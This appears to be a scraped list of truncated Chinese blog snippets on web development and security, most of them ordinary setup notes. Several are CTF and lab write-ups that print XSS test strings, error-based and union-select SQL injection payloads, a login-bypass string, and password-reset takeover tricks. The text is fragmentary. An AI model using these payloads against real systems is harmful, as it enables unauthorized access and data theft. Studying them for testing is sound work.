xss 弹窗 <script>alert(1)</script> <script>prompt(2)</script> <script>confirm(3)</script> <script>console.log(3)</script> <script>document.write(1)</script> 当不能弹窗的时候 <script>console.log(3)&l
需求是:导出按钮只开放给特定的管理员(admin_id=1)如下图 由于导出功能是前端进行导出,不能再接口部分做导出权限的现在,所以思路是限制首页这个导出按钮只显示给超级管理员 实现代码如下: 1、在对应控制器的index方法,assignConfig返回特定管理员的id $this->assignconfig(
vue-element-admin node方式安装 1、git clone 项目(2选 1) // github 默认国际化版本(英文) https://github.com/PanJiaChen/vue-element-admin.git // gitee i18n 中文版本 https://gitee.com/panjiachen/vue-element-admin.git 2、增加文件 拉取的项目初始化时容易报错,所
一、版本环境 看了很多文章,没有写清楚环境的版本,导致解决方案根本对不上号,所以我先把本人使用的主要模块版本列出来 Flask==2.1.3 Flask-Migrate==3.1.0 Flask-Script==2.0.6 Flask-SQLAlchemy==2.5.1 本人开发环境为Windows + VSCode 二、遇到的问题 一开始,我按照网上的大部分教
1、burpsuit抓包,跑一下fuzz 发现长度为736的都被过滤掉了 2、观察error界面,猜测应该是报错注入 先爆数据库名 1 admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))#、0x7e代表~ 得到数据库名geek 3、爆表名 1 admin'or(updatexml(1,concat(0x7e,(select(table_name)
1、打开靶机,先尝试一下万能密码 1 admin'or 1=1# 2 1234 2、尝试爆字段 1 admin'order by 1# 2 admin'order by 2# 3 admin'order by 3# 4 admin'order by 4# 3、看回显位置 1 1' union select 1,2,3# 回显在二、三位置 4、爆数据库 1 1' union select 1,database(),ve
需求背景 有些第三方的jar包需要手动上传到maven私有仓库,以便通过maven来管理依赖. 为简化手动上传的jar包的操作步骤,所以整了个脚本,在使用时只需修改相应变量即可。 脚本示例 #!/bin/bash jarFile="test.jar" groupId="com.wywtime" artifactId="test" version="1.0.0" # 私有仓
1 能同步操作mysql_query_rules mysql_serversmysql_users proxysql_servers2 不能同步操作 admin_variables mysql_variables3 认证用户update global_variables set variable_value='<REPLACE-HERE>' where variable_name='admin-admin_credentials';update glob
[GXYCTF2019]BabySQli 按正常思路,先判断是不是存在sql注入 发现存在sql注入,我们尝试一下用万能密码登录 发现可能是被过滤了,再用admin的用户名尝试登录一下 发现回显的是wrong pass!发现是存在这个admin用户的,只是密码错了 所以我们按照正常的sql注入的思路去尝试,先尝试判断
Django python网络编程回顾 之前我们介绍过web应用程序和http协议,简单了解过web开发的概念。Web应用程序的本质 接收并解析HTTP请求,获取具体的请求信息 处理本次HTTP请求,即完成本次请求的业务逻辑处理 构造并返回处理结果——HTTP响应 import socket server = socket.socket(
目录一、简介二、docker方式安装三、k8s方式安装四、参考 一、简介 XXL-JOB是一个轻量级分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。xxl三个字母是其开发者许雪里名字的缩写 github地址:https://git
UPDATE "main"."auth_permission" SET "content_type_id" = 1, "name" = 'Can add 日志记录' WHERE "codename" = 'add_logentry'; UPDATE "main"."auth_permission" SET "cont
# 重写 修改、添加 def save_model(self, request, obj, form, change): if change: """ 重写 修改按钮 """ super().save_model(request, obj, form, change) UserInfo.objects.filter(pk=obj.id).
密码找回 验证码发送前端返回 验证码无次数限制爆破 验证码可控制 直接修改验证码 越权漏洞,自己的验证码修改别人账号的密码 admin用户绑定了15522222222,在找回密码中输入admin用户发现存在admin用户的手机号,把这个手机号改成自己的手机号,就可以通过自己的验证码修改别人账号的
[.env] 1) 使用python-dotenv 安装: pip install python-dotenv 示例配置文件: ADMIN_HOST = https://uat-rm-gwaaa.cn ADMIN_LOGIN_ROUTE = /api/rm/auth/admin/login ADMIN_LOGIN_DATA = {"phone":"13922221111","password":"6d614954ed51&
docker-registry 私有仓库镜像 之 查看与删除 镜像下载、域名解析、时间同步请点击 阿里云开源镜像站 查看私有仓库有哪些镜像 如果私有仓库带有认证,在使用 curl 命令的时候需要带上 -u 参数 使用方法: curl -XGET -u <仓库用户名>:<用户名密码> http://<仓库ip地址>:<仓库
项目介绍:前端时间做了一个项目用qt 编写软件获取海康摄像头rtsp视频流,实现实时显示。当时采用的是VLC-Qt播放RTSP流这种方式(参考:https://blog.csdn.net/caoshangpa/article/details/53158571)。花了一段时间研究也做出来了,可是发现了一个无法解决的问题,即无法解决视频延迟的问题,差
1、进入官网下载dubbo-admin,代码地址:https://github.com/apache/dubbo-admin 2、 下载0.4.0版本ZIP包,如下图所示:
首先打开题目,一眼看到关键 可以通过工具搜查出来备份文件,博主使用御剑不知怎么的没扫出来,手动验证www.zip或者index.php.bak 然后下载压缩包,解压得到 浏览三个源码文件 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'non
出处:https://github.com/PanJiaChen/vue-element-admin/issues/406 1.解决keep-alive失效,在src目录下permission.js文件添加如下代码 //解决三级菜单keep-alive缓存失效 router.beforeResolve((to, from, next) => { if (to.matched && to.matched.length > 2) { to.matc
靶场地址:http://kypt8004.ia.aqlab.cn/shownews.asp?id=171 在这个靶场的新闻中心中,我们发现url中带有id参数,尝试试探是否存在sql注入,通过在参数后面添加 and 1=1 这里经过了特殊处理,被过滤了,所以尝试其他突破点,将参数放入cookie中去尝试是否有效: id = 171%20and%20
# models.py from django.db import models from django.contrib.auth.models import AbstractUser,Group,Permission # 这里也可以扩展权限表 就不演示了 # 继承admin用户表 并且扩展 class AdminUser(AbstractUser): admin_name = models.CharField(max_length=25,
前言 很久很久以前写过好几篇关于定时任务的使用系列的文章: 这一篇是最简单的,就是单纯跑跑定时任务,那你看这篇就行,没必要用xxljob(因为xxljob要跑服务端,然后自己服务作为客户端接入): 文章 使用@Scheduled 简单实现定时任务 然后这一篇是开始打开封装的壳子,开始可以自己
对SQL请求提取参数 数据库的查询接口存储分为“按结果存储”和“按列存储”。 比如数据库查询结果如下图: 按结果存储,会将所有的查询结果按照对象的模式进行存储至变量 结果如下: 点击查看代码 admin_token=[{origin_sid=0, city_code=0, origin_id=0, son_department_id=0, type
前两篇介绍DotNetCore.CAP的链接 第一篇,项目初始化 第二篇,使用MySQL 安装依赖:DotNetCore.CAP.RabbitMQ 这里使用RabbitMQ Docker image作为服务容器,安装Docker工具的步骤省略,通过以下步骤启动RabbitMQ容器 一)创建bridge网络: docker network create mq-net docker network ls 二)启